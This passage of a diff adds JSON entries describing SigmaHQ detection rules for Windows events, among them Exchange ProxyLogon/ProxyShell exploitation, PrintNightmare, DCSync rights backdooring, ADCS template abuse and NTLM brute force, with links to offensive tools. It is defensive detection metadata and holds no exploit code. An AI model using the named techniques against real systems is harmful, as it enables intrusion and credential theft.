"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1200" + ], + "creation_date": "2017/11/09", + "filename": "win_usb_device_plugged.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_add_rule.yml", + "author": "frack113", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", + "value": "Modified Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_change_rule.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + 
} + }, + { + "description": "A rule has been deleted in the Windows Firewall exception list.", + "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "value": "Delete Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_delete_rule.yml", + "author": "frack113", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The Windows Firewall service failed to load Group Policy.", + "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", + "value": "Failed to Load Policy in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_failed.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Firewall has been reset to its default configuration.", + "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", + "value": "Reset to Default Configuration Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_reset.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Setting have been change in Windows Firewall", + "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "value": "Setting Change in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_setting_change.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible Active Directory enumeration via LDAP", + "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", + "value": "LDAP Reconnaissance / Active Directory Enumeration", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + 
"creation_date": "2021/06/22", + "filename": "win_ldap_recon.yml", + "author": "Adeem Mawani", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "value": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210" + ], + "creation_date": "2021/11/18", + "filename": "win_exchange_cve_2021_42321.yml", + "author": "Florian Roth, @testanull", + "level": "high", + "falsepositive": [ + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", + "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", + "value": "ProxyLogon MSExchange OabVirtualDirectory", + "meta": { + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2021/08/09", + "filename": "win_exchange_proxylogon_oabvirtualdir.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + 
"logsource.product": "windows" + } + }, + { + "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", + "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", + "value": "Certificate Request Export to Exchange Webserver", + "meta": { + "refs": [ + "https://twitter.com/GossiTheDog/status/1429175908905127938", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/08/23", + "filename": "win_exchange_proxyshell_certificate_generation.yml", + "author": "Max Altgelt", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", + "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", + "value": "Mailbox Export to Exchange Webserver", + "meta": { + "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/08/09", + "filename": "win_exchange_proxyshell_mailbox_export.yml", + "author": "Florian Roth, Rich Warren, Christian Burkard", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", + "uuid": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "value": "Remove Exported 
Mailbox from Exchange Webserver", + "meta": { + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2021/08/27", + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", + "uuid": "9db37458-4df2-46a5-95ab-307e7f29e675", + "value": "Exchange Set OabVirtualDirectory ExternalUrl Property", + "meta": { + "refs": [ + "https://twitter.com/OTR_Community/status/1371053369071132675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/03/15", + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml", + "author": "Jose Rodriguez @Cyb3rPandaH", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "value": "MSExchange Transport Agent Installation - Builtin", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + 
"attack.t1505.002" + ], + "creation_date": "2021/06/08", + "filename": "win_exchange_transportagent.yml", + "author": "Tobias Michalski", + "level": "medium", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a failed installation of a Exchange Transport Agent", + "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", + "value": "Failed MSExchange Transport Agent Installation", + "meta": { + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ], + "creation_date": "2021/06/08", + "filename": "win_exchange_transportagent_failed.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logons using NTLM, which could be caused by a legacy source or attackers", + "uuid": "98c3bcf1-56f2-49dc-9d8d-c66cf190238b", + "value": "NTLM Logon", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/1004895028995477505", + "https://goo.gl/PsqrhT", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ], + "creation_date": "2018/06/08", + "filename": "win_susp_ntlm_auth.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legacy hosts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects common NTLM brute force device names", + "uuid": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", + "value": "NTLM Brute Force", + "meta": { + "refs": [ + "https://www.varonis.com/blog/investigate-ntlm-brute-force", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/02/02", + "filename": "win_susp_ntlm_brute_force.yml", + "author": "Jerry Shockley '@jsh0x'", + "level": "medium", + "falsepositive": [ + "Systems with names equal to the spoofed ones used by the brute force tools" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", + "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", + "value": "Potential Remote Desktop Connection to Non-Domain Host", + "meta": { + "refs": [ + "n/a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + 
"creation_date": "2020/05/22", + "filename": "win_susp_ntlm_rdp.yml", + "author": "James Pemberton", + "level": "medium", + "falsepositive": [ + "Host connections to valid domains, exclude these.", + "Host connections not using host FQDN.", + "Host connections to external legitimate domains." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", + "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "value": "OpenSSH Server Listening On Socket", + "meta": { + "refs": [ + "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", + "https://winaero.com/enable-openssh-server-windows-10/", + "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", + "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.004" + ], + "creation_date": "2022/10/25", + "filename": "win_sshd_openssh_server_listening_on_socket.yml", + "author": "mdecrevoisier", + "level": "medium", + "falsepositive": [ + "Legitimate administrator activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects events of driver load errors in print service logs that could be a sign of successful exploitation attempts of print spooler vulnerability CVE-2021-1675", + "uuid": "4e64668a-4da1-49f5-a8df-9e2d5b866718", + "value": "Possible CVE-2021-1675 Print Spooler Exploitation", + "meta": { + "refs": [ + 
"https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://twitter.com/fuzzyf10w/status/1410202370835898371", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ], + "creation_date": "2021/06/30", + "filename": "win_exploit_cve_2021_1675_printspooler.yml", + "author": "Florian Roth, KevTheHermit, fuzzyf10w, Tim Shelton", + "level": "high", + "falsepositive": [ + "Problems with printer drivers" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "uuid": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "value": "CVE-2021-1675 Print Spooler Exploitation", + "meta": { + "refs": [ + "https://twitter.com/MalwareJake/status/1410421967463731200", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler_operational.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "cve.2021.1675" + ], + "creation_date": "2021/07/01", + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", + "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", + "value": 
"Azure AD Health Monitoring Agent Registry Keys Access", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2021/08/26", + "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "value": "Azure AD Health Service Agents Registry Keys Access", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1012" + ], + "creation_date": "2021/08/26", + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule tries to detect token impersonation and theft. 
(Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1134/001/", + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ], + "creation_date": "2022/11/06", + "filename": "win_security_access_token_abuse.yml", + "author": "Michaela Adams, Zach Mathis", + "level": "medium", + "falsepositive": [ + "Anti-Virus" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "meta": { + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2019/04/03", + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "level": "high", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value 
attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "uuid": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "value": "AD Privileged Users or Groups Reconnaissance", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2019/04/03", + "filename": "win_security_account_discovery.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "If source account name is not an admin then its super suspicious" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2021/11/17", + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "author": "Orlinum , BlueDefenZer", + "level": "low", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": 
"Detects certificate creation with template allowing risk permission subject and risky EKU", + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ], + "creation_date": "2021/11/17", + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "author": "Orlinum , BlueDefenZer", + "level": "high", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "value": "Add or Remove Computer from DC", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_add_remove_computer.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "uuid": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "value": "User with Privileges Logon", + "meta": { + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_logon.yml" + ], + "tags": "No established tags", + "creation_date": "2022/10/14", + "filename": "win_security_admin_logon.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect remote login by 
Administrator user (depending on internal pattern).", + "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "value": "Admin User Remote Logon", + "meta": { + "refs": [ + "https://car.mitre.org/wiki/CAR-2016-04-005", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1078.001", + "attack.t1078.002", + "attack.t1078.003", + "car.2016-04-005" + ], + "creation_date": "2017/10/29", + "filename": "win_security_admin_rdp_login.yml", + "author": "juju4", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to $ADMIN share", + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2017/03/04", + "filename": "win_security_admin_share_access.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC Access", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ], + "creation_date": "2019/09/12", + "filename": "win_security_ad_object_writedac_access.yml", + "author": "Roberto Rodriguez 
@Cyb3rWard0g", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "uuid": "17d619c1-e020-4347-957e-1d1207455c93", + "value": "Active Directory Replication from Non Machine Account", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.006" + ], + "creation_date": "2019/07/26", + "filename": "win_security_ad_replication_non_machine_account.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects access to a domain user from a non-machine account", + "uuid": "ab6bffca-beff-4baa-af11-6733f296d57a", + "value": "AD User Enumeration", + "meta": { + "refs": [ + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html", + "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ], + "creation_date": "2020/03/30", + "filename": "win_security_ad_user_enumeration.yml", + "author": "Maxime Thiebaut (@0xThiebaut)", + "level": "medium", + "falsepositive": [ + "Administrators configuring new users." 
+ ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", + "uuid": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", + "value": "Enabled User Right in AD to Control User Objects", + "meta": { + "refs": [ + "https://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_active_directory_user_control.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2017/07/30", + "filename": "win_security_alert_active_directory_user_control.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", + "uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc", + "value": "Active Directory User Backdoors", + "meta": { + "refs": [ + "https://msdn.microsoft.com/en-us/library/cc220234.aspx", + "https://adsecurity.org/?p=3466", + "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ], + "creation_date": "2017/04/13", + "filename": "win_security_alert_ad_user_backdoors.yml", + "author": "@neu5ron", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for 
